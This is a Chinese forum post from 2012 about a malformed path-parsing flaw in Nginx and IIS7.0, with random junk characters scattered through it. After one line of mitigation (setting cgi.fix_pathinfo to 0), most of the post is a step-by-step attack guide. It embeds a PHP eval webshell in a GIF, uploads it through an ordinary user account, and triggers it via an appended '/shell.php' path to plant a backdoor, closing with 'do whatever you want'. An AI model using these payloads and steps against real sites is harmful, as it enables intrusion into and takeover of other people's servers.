IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0
+ Y2 r& q. t' Q/ L4 ~: |Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
0 W$ f1 e1 \+ ?6 n0 s__________________________________
9 M* C y0 C2 x G; ?( x) \* h; q3 ^9 j# d! H& `9 z. R" Z
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
$ \- u' O% E3 Q* [. R" [# C% M2 m先合并一张PHP一句话图片马,合并方法:
+ ]' ?2 p$ ?( [& @4 }①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
3 d7 ]- m7 s$ a②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>"
O; [2 ~6 _" m( c, X" ^% g( R图片随便找一张. . h5 }; I4 W. q" _/ O8 H
一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?>
+ c" [" H$ d7 q7 v然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
/ O- m; |6 y0 M7 r( i0 O7 F找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
* K% I Q6 C; g& B3 s比如假设图片地址为 http://www.political-security.com/tupian/1.jpg- T% X$ f( m6 d5 I& f- M- Q+ K% {
则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
' F; H, {' l* u然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php
. L. K9 t- \! h! G3 N* [shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。 " T$ ^. Z. w) e y
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
9 N' i3 T' N1 y6 S, \' ?; q2 h5 ]找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。 5 Q0 ~5 d/ c2 o( O7 R1 _/ n
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。 7 {4 j$ z8 ]& E
剩下的就随便你去搞吧。7 }: x0 {% B" q& t0 J; L
) l1 N" v, X% k( x) L( q4 U |
发表于 2012-9-27 19:40:10
收藏
支持
反对